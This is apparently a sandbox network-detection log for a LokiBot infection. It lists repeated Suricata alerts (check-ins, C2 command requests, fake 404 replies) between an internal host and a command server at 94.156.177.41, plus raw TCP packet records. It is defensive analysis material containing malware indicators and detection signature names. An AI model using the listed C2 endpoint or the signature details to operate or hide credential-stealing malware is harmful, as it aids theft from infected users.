2024-12-04T06:53:05.702695+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49793	94.156.177.41	80	TCP
2024-12-04T06:53:05.702695+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49793	94.156.177.41	80	TCP
2024-12-04T06:53:05.822697+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49793	TCP
2024-12-04T06:53:06.095984+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49799	94.156.177.41	80	TCP
2024-12-04T06:53:06.095984+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49799	94.156.177.41	80	TCP
2024-12-04T06:53:06.095984+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49799	94.156.177.41	80	TCP
2024-12-04T06:53:07.476673+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49799	94.156.177.41	80	TCP
2024-12-04T06:53:07.476673+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49799	94.156.177.41	80	TCP
2024-12-04T06:53:07.596717+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49799	TCP
2024-12-04T06:53:07.851506+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49805	94.156.177.41	80	TCP
2024-12-04T06:53:07.851506+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49805	94.156.177.41	80	TCP
2024-12-04T06:53:07.851506+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49805	94.156.177.41	80	TCP
2024-12-04T06:53:09.330217+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49805	94.156.177.41	80	TCP
2024-12-04T06:53:09.330217+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49805	94.156.177.41	80	TCP
2024-12-04T06:53:09.450203+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49805	TCP
2024-12-04T06:53:09.713035+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49811	94.156.177.41	80	TCP
2024-12-04T06:53:09.713035+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49811	94.156.177.41	80	TCP
2024-12-04T06:53:09.713035+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49811	94.156.177.41	80	TCP
2024-12-04T06:53:11.164303+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49811	94.156.177.41	80	TCP
2024-12-04T06:53:11.164303+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49811	94.156.177.41	80	TCP
2024-12-04T06:53:11.284231+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49811	TCP
2024-12-04T06:53:11.637327+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49816	94.156.177.41	80	TCP
2024-12-04T06:53:11.637327+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49816	94.156.177.41	80	TCP
2024-12-04T06:53:11.637327+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49816	94.156.177.41	80	TCP
2024-12-04T06:53:12.980893+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49816	94.156.177.41	80	TCP
2024-12-04T06:53:12.980893+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49816	94.156.177.41	80	TCP
2024-12-04T06:53:13.101166+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49816	TCP
2024-12-04T06:53:13.370849+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49818	94.156.177.41	80	TCP
2024-12-04T06:53:13.370849+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49818	94.156.177.41	80	TCP
2024-12-04T06:53:13.370849+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49818	94.156.177.41	80	TCP
2024-12-04T06:53:14.868129+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49818	94.156.177.41	80	TCP
2024-12-04T06:53:14.868129+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49818	94.156.177.41	80	TCP
2024-12-04T06:53:14.988014+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49818	TCP
2024-12-04T06:53:15.244855+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49824	94.156.177.41	80	TCP
2024-12-04T06:53:15.244855+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49824	94.156.177.41	80	TCP
2024-12-04T06:53:15.244855+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49824	94.156.177.41	80	TCP
2024-12-04T06:53:16.678278+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49824	94.156.177.41	80	TCP
2024-12-04T06:53:16.678278+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49824	94.156.177.41	80	TCP
2024-12-04T06:53:16.798129+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49824	TCP
2024-12-04T06:53:17.057306+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49829	94.156.177.41	80	TCP
2024-12-04T06:53:17.057306+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49829	94.156.177.41	80	TCP
2024-12-04T06:53:17.057306+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49829	94.156.177.41	80	TCP
2024-12-04T06:53:18.586498+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49829	94.156.177.41	80	TCP
2024-12-04T06:53:18.586498+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49829	94.156.177.41	80	TCP
2024-12-04T06:53:18.706548+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49829	TCP
2024-12-04T06:53:18.965518+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49834	94.156.177.41	80	TCP
2024-12-04T06:53:18.965518+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49834	94.156.177.41	80	TCP
2024-12-04T06:53:18.965518+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49834	94.156.177.41	80	TCP
2024-12-04T06:53:20.454492+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49834	94.156.177.41	80	TCP
2024-12-04T06:53:20.454492+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49834	94.156.177.41	80	TCP
2024-12-04T06:53:20.574452+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49834	TCP
2024-12-04T06:53:20.841367+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49841	94.156.177.41	80	TCP
2024-12-04T06:53:20.841367+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49841	94.156.177.41	80	TCP
2024-12-04T06:53:20.841367+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49841	94.156.177.41	80	TCP
2024-12-04T06:53:22.119370+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49841	94.156.177.41	80	TCP
2024-12-04T06:53:22.119370+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49841	94.156.177.41	80	TCP
2024-12-04T06:53:22.239334+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49841	TCP
2024-12-04T06:53:22.493732+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49845	94.156.177.41	80	TCP
2024-12-04T06:53:22.493732+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49845	94.156.177.41	80	TCP
2024-12-04T06:53:22.493732+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49845	94.156.177.41	80	TCP
2024-12-04T06:53:23.990954+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49845	94.156.177.41	80	TCP
2024-12-04T06:53:23.990954+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49845	94.156.177.41	80	TCP
2024-12-04T06:53:24.111122+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49845	TCP
2024-12-04T06:53:24.369185+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49850	94.156.177.41	80	TCP
2024-12-04T06:53:24.369185+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49850	94.156.177.41	80	TCP
2024-12-04T06:53:24.369185+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49850	94.156.177.41	80	TCP
2024-12-04T06:53:25.847762+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49850	94.156.177.41	80	TCP
2024-12-04T06:53:25.847762+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49850	94.156.177.41	80	TCP
2024-12-04T06:53:25.967804+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49850	TCP
2024-12-04T06:53:26.229898+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49855	94.156.177.41	80	TCP
2024-12-04T06:53:26.229898+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49855	94.156.177.41	80	TCP
2024-12-04T06:53:26.229898+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49855	94.156.177.41	80	TCP
2024-12-04T06:53:27.716217+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49855	94.156.177.41	80	TCP
2024-12-04T06:53:27.716217+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49855	94.156.177.41	80	TCP
2024-12-04T06:53:27.836168+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49855	TCP
2024-12-04T06:53:28.109936+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49861	94.156.177.41	80	TCP
2024-12-04T06:53:28.109936+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49861	94.156.177.41	80	TCP
2024-12-04T06:53:28.109936+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49861	94.156.177.41	80	TCP
2024-12-04T06:53:29.409695+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49861	94.156.177.41	80	TCP
2024-12-04T06:53:29.409695+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49861	94.156.177.41	80	TCP
2024-12-04T06:53:29.529651+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49861	TCP
2024-12-04T06:53:29.804559+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49866	94.156.177.41	80	TCP
2024-12-04T06:53:29.804559+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49866	94.156.177.41	80	TCP
2024-12-04T06:53:29.804559+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49866	94.156.177.41	80	TCP
2024-12-04T06:53:31.273515+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49866	94.156.177.41	80	TCP
2024-12-04T06:53:31.273515+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49866	94.156.177.41	80	TCP
2024-12-04T06:53:31.393432+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49866	TCP
2024-12-04T06:53:31.659622+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49871	94.156.177.41	80	TCP
2024-12-04T06:53:31.659622+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49871	94.156.177.41	80	TCP
2024-12-04T06:53:31.659622+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49871	94.156.177.41	80	TCP
2024-12-04T06:53:33.162635+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49871	94.156.177.41	80	TCP
2024-12-04T06:53:33.162635+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49871	94.156.177.41	80	TCP
2024-12-04T06:53:33.282610+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49871	TCP
2024-12-04T06:53:33.543135+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49875	94.156.177.41	80	TCP
2024-12-04T06:53:33.543135+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49875	94.156.177.41	80	TCP
2024-12-04T06:53:33.543135+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49875	94.156.177.41	80	TCP
2024-12-04T06:53:35.093148+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49875	94.156.177.41	80	TCP
2024-12-04T06:53:35.093148+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49875	94.156.177.41	80	TCP
2024-12-04T06:53:35.213127+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49875	TCP
2024-12-04T06:53:35.720159+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49881	94.156.177.41	80	TCP
2024-12-04T06:53:35.720159+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49881	94.156.177.41	80	TCP
2024-12-04T06:53:35.720159+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49881	94.156.177.41	80	TCP
2024-12-04T06:53:37.030637+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49881	94.156.177.41	80	TCP
2024-12-04T06:53:37.030637+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49881	94.156.177.41	80	TCP
2024-12-04T06:53:37.150752+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49881	TCP
2024-12-04T06:53:37.417338+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49886	94.156.177.41	80	TCP
2024-12-04T06:53:37.417338+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49886	94.156.177.41	80	TCP
2024-12-04T06:53:37.417338+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49886	94.156.177.41	80	TCP
2024-12-04T06:53:38.846753+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49886	94.156.177.41	80	TCP
2024-12-04T06:53:38.846753+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49886	94.156.177.41	80	TCP
2024-12-04T06:53:38.966714+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49886	TCP
2024-12-04T06:53:39.230433+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49891	94.156.177.41	80	TCP
2024-12-04T06:53:39.230433+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49891	94.156.177.41	80	TCP
2024-12-04T06:53:39.230433+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49891	94.156.177.41	80	TCP
2024-12-04T06:53:40.713775+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49891	94.156.177.41	80	TCP
2024-12-04T06:53:40.713775+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49891	94.156.177.41	80	TCP
2024-12-04T06:53:40.833744+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49891	TCP
2024-12-04T06:53:41.090316+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49896	94.156.177.41	80	TCP
2024-12-04T06:53:41.090316+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49896	94.156.177.41	80	TCP
2024-12-04T06:53:41.090316+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49896	94.156.177.41	80	TCP
2024-12-04T06:53:42.517335+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49896	94.156.177.41	80	TCP
2024-12-04T06:53:42.517335+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49896	94.156.177.41	80	TCP
2024-12-04T06:53:42.637349+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49896	TCP
2024-12-04T06:53:42.933722+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49902	94.156.177.41	80	TCP
2024-12-04T06:53:42.933722+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49902	94.156.177.41	80	TCP
2024-12-04T06:53:42.933722+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49902	94.156.177.41	80	TCP
2024-12-04T06:53:44.404340+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49902	94.156.177.41	80	TCP
2024-12-04T06:53:44.404340+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49902	94.156.177.41	80	TCP
2024-12-04T06:53:44.524266+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49902	TCP
2024-12-04T06:53:44.792352+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49906	94.156.177.41	80	TCP
2024-12-04T06:53:44.792352+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49906	94.156.177.41	80	TCP
2024-12-04T06:53:44.792352+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49906	94.156.177.41	80	TCP
2024-12-04T06:53:46.309965+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49906	94.156.177.41	80	TCP
2024-12-04T06:53:46.309965+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49906	94.156.177.41	80	TCP
2024-12-04T06:53:46.431533+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49906	TCP
2024-12-04T06:53:46.706490+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49912	94.156.177.41	80	TCP
2024-12-04T06:53:46.706490+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49912	94.156.177.41	80	TCP
2024-12-04T06:53:46.706490+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49912	94.156.177.41	80	TCP
2024-12-04T06:53:48.190933+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49912	94.156.177.41	80	TCP
2024-12-04T06:53:48.190933+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49912	94.156.177.41	80	TCP
2024-12-04T06:53:48.311015+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49912	TCP
2024-12-04T06:53:48.570673+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49916	94.156.177.41	80	TCP
2024-12-04T06:53:48.570673+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49916	94.156.177.41	80	TCP
2024-12-04T06:53:48.570673+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49916	94.156.177.41	80	TCP
2024-12-04T06:53:50.049274+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49916	94.156.177.41	80	TCP
2024-12-04T06:53:50.049274+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49916	94.156.177.41	80	TCP
2024-12-04T06:53:50.169203+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49916	TCP
2024-12-04T06:53:50.433426+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49920	94.156.177.41	80	TCP
2024-12-04T06:53:50.433426+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49920	94.156.177.41	80	TCP
2024-12-04T06:53:50.433426+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49920	94.156.177.41	80	TCP
2024-12-04T06:53:51.907714+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49920	94.156.177.41	80	TCP
2024-12-04T06:53:51.907714+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49920	94.156.177.41	80	TCP
2024-12-04T06:53:52.029213+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49920	TCP
2024-12-04T06:53:52.290981+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49925	94.156.177.41	80	TCP
2024-12-04T06:53:52.290981+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49925	94.156.177.41	80	TCP
2024-12-04T06:53:52.290981+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49925	94.156.177.41	80	TCP
2024-12-04T06:53:53.783128+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49925	94.156.177.41	80	TCP
2024-12-04T06:53:53.783128+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49925	94.156.177.41	80	TCP
2024-12-04T06:53:53.903102+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49925	TCP
2024-12-04T06:53:54.163772+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49930	94.156.177.41	80	TCP
2024-12-04T06:53:54.163772+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49930	94.156.177.41	80	TCP
2024-12-04T06:53:54.163772+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49930	94.156.177.41	80	TCP
2024-12-04T06:53:55.529845+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49930	94.156.177.41	80	TCP
2024-12-04T06:53:55.529845+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49930	94.156.177.41	80	TCP
2024-12-04T06:53:55.649895+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49930	TCP
2024-12-04T06:53:55.922617+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49936	94.156.177.41	80	TCP
2024-12-04T06:53:55.922617+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49936	94.156.177.41	80	TCP
2024-12-04T06:53:55.922617+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49936	94.156.177.41	80	TCP
2024-12-04T06:53:57.398751+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49936	94.156.177.41	80	TCP
2024-12-04T06:53:57.398751+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49936	94.156.177.41	80	TCP
2024-12-04T06:53:57.518639+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49936	TCP
2024-12-04T06:53:57.777455+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49941	94.156.177.41	80	TCP
2024-12-04T06:53:57.777455+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49941	94.156.177.41	80	TCP
2024-12-04T06:53:57.777455+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49941	94.156.177.41	80	TCP
2024-12-04T06:53:59.245469+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49941	94.156.177.41	80	TCP
2024-12-04T06:53:59.245469+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49941	94.156.177.41	80	TCP
2024-12-04T06:53:59.365409+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49941	TCP
2024-12-04T06:53:59.620459+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49946	94.156.177.41	80	TCP
2024-12-04T06:53:59.620459+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49946	94.156.177.41	80	TCP
2024-12-04T06:53:59.620459+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49946	94.156.177.41	80	TCP
2024-12-04T06:54:01.080502+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49946	94.156.177.41	80	TCP
2024-12-04T06:54:01.080502+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49946	94.156.177.41	80	TCP
2024-12-04T06:54:01.200593+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49946	TCP
2024-12-04T06:54:01.491745+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49950	94.156.177.41	80	TCP
2024-12-04T06:54:01.491745+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49950	94.156.177.41	80	TCP
2024-12-04T06:54:01.491745+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49950	94.156.177.41	80	TCP
2024-12-04T06:54:02.961210+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49950	94.156.177.41	80	TCP
2024-12-04T06:54:02.961210+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49950	94.156.177.41	80	TCP
2024-12-04T06:54:03.081113+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49950	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 4, 2024 06:52:06.525391102 CET	49737	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:06.645394087 CET	80	49737	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:06.645503998 CET	49737	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:06.647583961 CET	49737	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:06.767563105 CET	80	49737	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:06.767642021 CET	49737	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:06.887603045 CET	80	49737	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:08.289335012 CET	80	49737	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:08.289362907 CET	80	49737	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:08.289515972 CET	49737	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:08.289515972 CET	49737	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:08.409615040 CET	80	49737	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:08.453470945 CET	49738	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:08.573559046 CET	80	49738	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:08.573658943 CET	49738	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:08.575700045 CET	49738	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:08.695647955 CET	80	49738	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:08.695715904 CET	49738	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:08.815867901 CET	80	49738	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:10.175102949 CET	80	49738	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:10.175203085 CET	80	49738	94.156.177.41	192.168.2.4
Dec 4, 2024 06:52:10.175293922 CET	49738	80	192.168.2.4	94.156.177.41
Dec 4, 2024 06:52:10.175348043 CET	49738	80	192.168.2.4	94.156.177.41
